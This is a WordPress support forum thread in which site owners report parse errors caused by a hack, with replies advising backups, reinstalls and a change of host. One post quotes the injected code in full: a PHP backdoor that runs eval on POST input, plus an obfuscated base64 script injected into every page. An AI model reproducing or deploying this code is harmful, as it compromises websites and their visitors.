Posted 3 years ago #
I recently logged onto my blog and overnight it just messed up. Now when I just try to visit the page I get this error: HELP ME!
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/local/home/ronybig0/religiontranscends.com/wp-includes/classes.php on line 807
hsphere/local/home/ronybig0/religiontranscends.com/wp-includes/classes.php on line 807
whats on lines 800-810 of that file?
Posted 3 years ago #
Here's lines 800-811 - FYI I'm new to this... Don't talk BIG!
$this->responses[] = $x;
return $x;
}
function send() {
header('Content-Type: text/xml');
echo "<?xml version='1.0' standalone='yes'?><?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCclMkZgJTJGJCUyRSUyRSUyRSQAJTNDI2QmJTY5JTc2JCUyMCFzdCU3OSMlNkN8ZT0mJTY0fiU2OSU3M3AkJTZDQGF5YCUzQSU2RUBvQCU2RWAlNjUlM0UkXG58ZCU2RkAlNjNAJTc1YG0lNjUmbnR8JTJFISU3N2AlNzJpdCElNjUhJTI4ISImJTNDJTJGdCElNjUlNzhAdGElNzJlIWElM0UiKUA7I3YhJTYxciYlMjAkJTY5fiUyQ18sQCU2MSUzRHwlNUIiMiExOC45JTMzfi4lMzIjMCUzMiYuITYhJTMxIyUyMn4sfCUyMiMlMzclMzgjJTJFMSMlMzFgMC5gMTclMzUhLiUzMiElMzEkJTIyfl1gO19APWAlMzEkJTNCJTY5YCU2NiYlMjhAJTY0byQlNjMlNzUlNkR+ZXwlNkUlNzQlMkUlNjNvbyU2QmBpZXwlMkVAJTZEJCU2MSU3NCU2MyU2OCUyOCQlMkZAJTVDYiMlNjh+Z2BmYHRAJTNEJiUzMSUyRiUyOSM9PSU2RUAlNzUlNkNgbCQlMjl+JTY2fCU2RmByJTI4fmkkJTNEJTMwJTNCfCU2OSQlM0MkJTMyJTNCJCU2OSUyQiUyQiUyOSU2NCZvY3wlNzUmJTZEYGVgJTZFIyU3NH4lMkVgd3xyJTY5ISU3NCU2NSMoYCUyMmAlM0MjJTczJTYzJnJpJTcwJCU3NCYlM0VpJTY2JihgJTVGYCUyOSU2NG8lNjMhdSU2RCElNjUlNkUmJTc0YC4mJTc3ciU2OX4lNzRAZSUyOCElNUMlMjJ+JTNDJCU3M0AlNjMlNzImJTY5JTcwdCYlMjAjJTY5fCU2NHw9JTVGfCUyMiUyQiU2OSUyQiYlMjJfJTIwcyU3MmMmPSElMkYlMkYlMjIrIyU2MX4lNUIlNjl8XStAIiUyRmNAcCQlMkZgJTNFfCUzQyU1QyU1QyYvJCU3MyQlNjMjcmklNzAhJTc0JCUzRSElNUMlMjJ8JTI5QCUzQyU1QyMlMkZzYyYlNzIlNjlwJTc0JTNFfCUyMiUyOSUzQlxuIy8jJTJGJTNDJi8hJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cfHxAfCN8YHxcJHxcIXx+fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><wp_ajax>";
foreach ( $this->responses as $response )
echo $response;
echo '</wp_ajax>';
die();your site is hacked.
you have a lot of content on that blog. be very careful with how you proceed.
Do an immediate backup of your database.
I dont know what version youre running -- it would be helpful to know that, so I can give you some specific advice.
In the meantime, you can look through some of the other threads Ive replied to to get some general advice.
to get your backup -- login to your hosts control panel.
Heres what the page will look like after you login (thats your own hosts DEMO page):
http://cp6.ixwebhosting.com/psoft/servlet/psoft.hsphere.CP/demolinux/1273400_0/demolin_test888
scroll down that page, and you will see phpmyadmin and an icon.
click that icon..
find your wordpress database, and click the icon on the far right of the page.
that opens phpmyadmin.
From there, follow this:
http://codex.wordpress.org/Backing_Up_Your_Database
-----
I provided the demo above for instructional purposes only. You need to login at the top of this page to actually "do" all this for real:
Posted 3 years ago #
just a warning to people with IXwebhosting, just about everyone is getting hacked who has a wordpress blog or other type of PHP-based web platform. they have a horrible security problem and sites are getting reinfected from other hosting accounts on shared servers.
so, even if you get yours cleaned out, it will likely come back. you should leave IXwebhosting as soon as you can.
you should leave IXwebhosting as soon as you can.
I agree, and made mention of both the widespread hacking and my opinion re: changing hosts, in related thread.
They (IXwebhosting) were actually rooted, and it sounds like they didnt take care of that properly.
Posted 3 years ago #
This is GREAT! (sarcasm)
Do you have a recommendation of a alternate host you like???
Posted 3 years ago #
I too have been plagued by IXWebhosting. I've been hacked twice now and they aren't helping one bit. They recently emailed me this on 12/16
We are happy to inform you that we are about to upgrade PHP to the latest version (4.4.9) on the webserver your website is currently being hosted on. This upgrade helps resolve many security exploits which were brought to our attention. With this upgrade we migrate from an Apache Module to a CGI based installation that gives you more control over many PHP settings. At this time you may now upload your very own php.ini file into your cgi-bin folder.
However, I'm still getting the same error as this topic.
Posted 3 years ago #
(at least) 7 months ago IX Web Hosting's servers were seeded by Hacker(s) and now an iFrame Sql injection script is injected into every file on the corrupted servers.
For more than 7 months IX has been lieing and deceiving customers.
You can read all about IX and the lies at
http://ixwebhostwarning.wordpress.com
My advice to anyone using IX, is to count your loss, and move on as soon as possible,things will get a lot worse, before they get better ( if ever)
Posted 3 years ago #
Okay, I just redid everything from the ground up. I deleted and then re-added my domain. Then installed the wordpress version 2.6.2. Then imported my database and theme. Everything worked fine. Now 3-4 days later out of nowwhere I get this error.
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/localblah blahblah/wp-includes/classes.php on line 1572
Is this still an ixwebhosting thing? Was a hacked again because of ixwebhosting? Or is their php version still old and not upgraded and it's their fault again? (Heard something about that)
If it's them again please let me know of a hosting company you trust for hosting.
Posted 2 years ago #
Hello,
I had the exact same error as the first post with a nearly identical line 807. I'm new to this, but in reading the replies, it sounds like I was hacked, but I have questions.
For background:
* I have two WordPress blogs on godaddy's deluxe hosting that have been running fine with no errors.
* I added the All in one SEO Pack and Google Analyticator plug-ins and the next day the sites were down with this error.
* This file along with most all of the others were updated at the within a few minutes of each other.
* Everything is backed up daily so the first time this happened, I restored it to the previous days files and it was fine and changed all passwords just to make sure.
* Everything was fine for a day and half and it happened again - same parse error, same that most all files were modified at about same time. I repeated the same process to get sites back online, but would like to find root of issue.
Godaddy said it could not be anything on their end. Any chance there is some type of automatic update with a plug-in or something that may be changing all the files?
Thanks.
Posted 2 years ago #
Hi,
I am getting same error on 1 of my client sites...
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/localblah blahblah/wp-includes/classes.php on line 1572
Can someone from WordPress.org please confirm if this is a HACKED situation ?
Thanks
Posted 2 years ago #
Hello again,
In looking into this further, I noticed a lot of code (similar to that shown above in other post) was added to this classes.php file and many others files on the site, all witin a few minutes.
So, I removed the plugins and the sites were doing ok (files did not update so the sites did not go down for a couple days), so I added the SEO Pack back and it's still doing ok. I haven't added Analyticator back yet. I'm hoping the sites stay up but am still very curious as to what this was so I can prevent it from happening again.
to theblogdoctor, anything sound familiar in our cases? Just trying to figure what could be causing it.
thanks.
Posted 2 years ago #
Okay, so something is taking down a number of my sites, I am getting this message below on all of them. Am I hacked?
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /public_html/hispy/wp-includes/classes.php on line 807
What do I do about this after I did a backup, I got the error again.
Posted 2 years ago #
'tmp_lkojfghx'
My line 807 contains the above tmp info over and over.
@ Ramirez_fabian - looks like you might have been hacked. I entered that term in Google and it returned countless results with everyone mentioning they've been hacked.
Check you code around that line number for something like: base64_decode()
If that's there, it's almost a sure thing you've been hacked.
Our company provides security upgrades for WordPress bloggers, but I'll be honest, nothing is 100% full proof.
@ garei - I know people who host on GoDaddy and have those plugins with no issues. It is possible your site was hacked. Also, do you have any backup copies of your database on the server (check areas like your wp-content/db-backup or something)? If someone can find that, they could get access to your blog. You might want to try some security enhancements to harden your WordPress install. Maybe it will detour the attacker.
Posted 2 years ago #
My team and I figured this one out, here's the solution and we are offering our services to those that don't feel like fixing them themselves. Nothing is lost, it just takes a bit to put the pieces all back together. First thing though is to look on your computer for a keylogger program that sends your wordpress password to the script kiddies. http://www.designandpromote.com/parse-error-syntax-error-unexpected-t_variable-solved/
Posted 2 years ago #
@ramirez_fabian
Yes, the site has been hacked. For my client, I had a backup of the posts. So I deleted the WP install, re-installed it and imported the Posts.
That "tmp_...." stuff you see is the haacked code. I am not sure what it does. I read in some forums that it was serving up ads and stuff on the pages.
Posted 2 years ago #
Also, I contacted the Hosting Company to figure out how the script was uploaded, because the client had a very complex alpha numeric password. They looked at the logs and said the FTP pwd was keyed in, so someone had access to that password.
I am not sure how the hacker or hacking code got that password. So I had the client change the Control Panel and FTP password after I re-installed the software.
This topic has been closed to new replies.
